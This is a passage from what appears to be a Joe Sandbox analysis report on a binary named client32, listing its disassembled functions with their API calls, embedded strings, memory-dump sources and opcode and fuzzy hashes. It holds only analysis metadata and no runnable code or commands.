                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CheckCountLicenseStringTick_fgets_strpbrkwsprintf
                                                                                                                                        • String ID: _License
                                                                                                                                        • API String ID: 2925274595-3969723640
                                                                                                                                        • Opcode ID: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                        • Instruction ID: 96a77fb98c0223eb2b4e36b27f4c2e587a44f0df050ee6f7a48cce7550f15376
                                                                                                                                        • Opcode Fuzzy Hash: 57eb07912173b09d2d6a718f612a6a8b2fea9b3332f7ae0c9a2918cf08a18aab
                                                                                                                                        • Instruction Fuzzy Hash: 7341E275C0465A9FDB11CF648C40BEABBFDAF49349F0481D5E889E3241E732AA46CF60
                                                                                                                                        Function 1100FF90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11010072
                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                                                                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                        • String ID: bad cast
                                                                                                                                        • API String ID: 2427920155-3145022300
                                                                                                                                        • Opcode ID: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                        • Instruction ID: eb2297de3126562b7a6adfe99aab1db74979c6a8f9cac3cb144437a799ef2362
                                                                                                                                        • Opcode Fuzzy Hash: b91949114c5cc0d56ba0394389beafb177cfa03f8955ddf8c17424d389eecb5f
                                                                                                                                        • Instruction Fuzzy Hash: B631E635E002658FCB52CF94C880BAEF7B4FB0536CF404269E865AB298DB75AD00CB91
                                                                                                                                        Function 11135BC0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountTick
                                                                                                                                        • String ID: 2e$AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                                                                        • API String ID: 536389180-1865515207
                                                                                                                                        • Opcode ID: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                        • Instruction ID: e3d06188695ac204c7c53c5cb05177b21b7d5d04c4fed9e193d22ae282c8029d
                                                                                                                                        • Opcode Fuzzy Hash: 82e572b6dc09f05acfa617eafdea0c45115b8c530f6da73777df33be47396042
                                                                                                                                        • Instruction Fuzzy Hash: D021E770A213A64EFF938AE5DD84765FE895780FAEF004139D420956CCE7749480DF56
                                                                                                                                        Function 11141240 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 111412AD
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,?), ref: 111412EE
                                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1114134B
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                                                        • API String ID: 3494822531-1878648853
                                                                                                                                        • Opcode ID: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                        • Instruction ID: 9db0ad8c4734361e4183e08fa1cc534476f5972450c8a9aa7511e5a375f2920b
                                                                                                                                        • Opcode Fuzzy Hash: 1d2eb1ac8d69a6f74e2d2292f6299ccec90df6a61e137f66e811ad89e50a1c5c
                                                                                                                                        • Instruction Fuzzy Hash: 42515975E0422E5BDB12CF248C54BDDF7A4AB05B18F2441E4EC89B7681EB717A84CB92
                                                                                                                                        Function 68902F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _calloc.LIBCMT ref: 68902FBB
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890300D
                                                                                                                                        • InterlockedExchange.KERNEL32(-00039761,00000000), ref: 6890301B
                                                                                                                                        • _calloc.LIBCMT ref: 6890303B
                                                                                                                                        • _memmove.LIBCMT ref: 68903049
                                                                                                                                        • InterlockedDecrement.KERNEL32(-000397B9), ref: 6890307F
                                                                                                                                        • SetEvent.KERNEL32(00000314,?,?,?,?,?,?,?,?,?,?,?,?,?,?,976C34B3), ref: 6890308C
                                                                                                                                          • Part of subcall function 689028D0: wsprintfA.USER32 ref: 68902965
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3178096747-0
                                                                                                                                        • Opcode ID: 1d94af034196da9a62ac61e2d4a6684a7ca5dd1710d1ab6d632a3215531c8c3d
                                                                                                                                        • Instruction ID: 53f9dfc601b75b829bebd5ff14eaf99743127fdf37a03546a1e79fef0b6be0c7
                                                                                                                                        • Opcode Fuzzy Hash: 1d94af034196da9a62ac61e2d4a6684a7ca5dd1710d1ab6d632a3215531c8c3d
                                                                                                                                        • Instruction Fuzzy Hash: 414162B6C04209AFDB10CFB9C844AEFB7F8EB48304F50852AE51AE7240E775D645CBA0
                                                                                                                                        Function 111042A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 110libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11186026,000000FF), ref: 11104373
                                                                                                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111043C2
                                                                                                                                        • std::exception::exception.LIBCMT ref: 11104424
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 11104439
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad$CreateEventException@8Throw_memsetstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                                                                        • API String ID: 1187064156-2390547818
                                                                                                                                        • Opcode ID: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                        • Instruction ID: bbbd634f828a37cff571ede067cab351b0e944a9bc0c67eb03fa8c0f48524c6c
                                                                                                                                        • Opcode Fuzzy Hash: 0e7ad8b693c498ee1e4a6f1cf957980c85518d600d03c49e45930bbad189b04a
                                                                                                                                        • Instruction Fuzzy Hash: 594114B5D09B449AC361CF6A8980BDAFBF8EFA9204F00494ED5AE93210D7787500CF51
                                                                                                                                        Function 688F9C49 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66sleeptimenetworkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • send.WSOCK32(?,?,?,00000000), ref: 688F9C93
                                                                                                                                        • timeGetTime.WINMM(?,?,?,00000000), ref: 688F9CD0
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 688F9CDE
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 688F9D4F
                                                                                                                                        • InterlockedIncrement.KERNEL32(?), ref: 688F9D72
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 77915721-280543908
                                                                                                                                        • Opcode ID: 0d45d342e29d838e7f1df81194fa492885af46f0fc0cfee9ab91cad5a4575f1b
                                                                                                                                        • Instruction ID: 8570e28b67e5a80d3149675f7176c5ba621eab35fd64203b9248dd01ad8488d8
                                                                                                                                        • Opcode Fuzzy Hash: 0d45d342e29d838e7f1df81194fa492885af46f0fc0cfee9ab91cad5a4575f1b
                                                                                                                                        • Instruction Fuzzy Hash: B121AE75A081188FDB20DF68CC88B9AB3B4AF05364F5146E5D81D9B282CB34ED86CF91
                                                                                                                                        Function 110259E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetProcessImageFileNameA), ref: 110259F6
                                                                                                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?), ref: 11025A12
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025A26
                                                                                                                                        • SetLastError.KERNEL32(00000078), ref: 11025A49
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                                                                        • API String ID: 4186647306-532032230
                                                                                                                                        • Opcode ID: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                        • Instruction ID: 68c8d787ea85bb7251c32f91647a1931aca61929af41b034d7bc2fd00ab8f334
                                                                                                                                        • Opcode Fuzzy Hash: 574c1049adaa66244907c1f724b524b0e4bf3f673811b9f0067a0ab7346ebc51
                                                                                                                                        • Instruction Fuzzy Hash: 46018036A41315AFD321DF69EC84F8BB7E8EB89765F10452AF986D7600D631E800CBB4
                                                                                                                                        Function 1110C2B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52synchronizationthreadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,7736C3F0,00000000,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF), ref: 1110C2C7
                                                                                                                                        • CreateThread.KERNEL32(00000000,1110D1D5,00000001,00000000,00000000,0000000C), ref: 1110C2EA
                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C317
                                                                                                                                        • CloseHandle.KERNEL32(?,?,1110D1D5,Function_0010CD70,00000001,00000000,?,?,?,000000FF,?,11026F57), ref: 1110C321
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                                                                        • API String ID: 3360349984-1136101629
                                                                                                                                        • Opcode ID: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                        • Instruction ID: a3115959ccdc6595f724f67194249590caf2e9fcdd86f69c2c7dc21ad5a21c7d
                                                                                                                                        • Opcode Fuzzy Hash: c3790b5b1b7a227f0163c935fda81ea00c8c7f3da45704e0867b963cb20d20f9
                                                                                                                                        • Instruction Fuzzy Hash: 2D01D4367403126FE7208E99DC89F4BBBA8EB54765F108128FA15876C0DA70E404CBA0
                                                                                                                                        Function 110313B0 Relevance: 9.0, APIs: 1, Strings: 5, Instructions: 28COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
